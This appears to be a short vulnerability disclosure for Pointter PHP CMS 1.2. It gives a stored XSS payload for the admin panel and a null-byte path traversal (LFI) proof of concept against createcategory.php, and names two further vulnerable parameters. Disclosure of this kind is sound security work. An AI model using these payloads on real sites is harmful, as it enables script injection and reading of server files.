pointter php content management system 1.2 - Multiple Vulnerabilities
Pointter PHP Content Management System 1.2 Multiple Vulnerabilities
Vendor: PangramSoft GmbH
Product web page: http://www.pointter.com
Affected version: 1.2
Summary: Pointter PHP Content Management System is an advanced, fast
and user friendly CMS script that can be used to build simple websites
or professional websites with product categorization, product blogs,
member login and search modules. The webmaster can create unlimited
static page boxes, static pages, main categories, sub categories and
product pages.
---
XSS:
The stored XSS is pretty much everywhere in the admin panel, just posting the
string '"><script>alert(1)</script>' when editing some category, and on every
return on the main page u get annoyed.
LFI:
script: pointtercms/admin/functions/createcategory.php
post param: category
poc: category=../../../../../../../../../test.txt%00&code=0e=0
script: pointtercms/admin/functions/createpage.php
post param: pageurl
script: pointtercms/admin/functions/createproduct.php
post param: producturl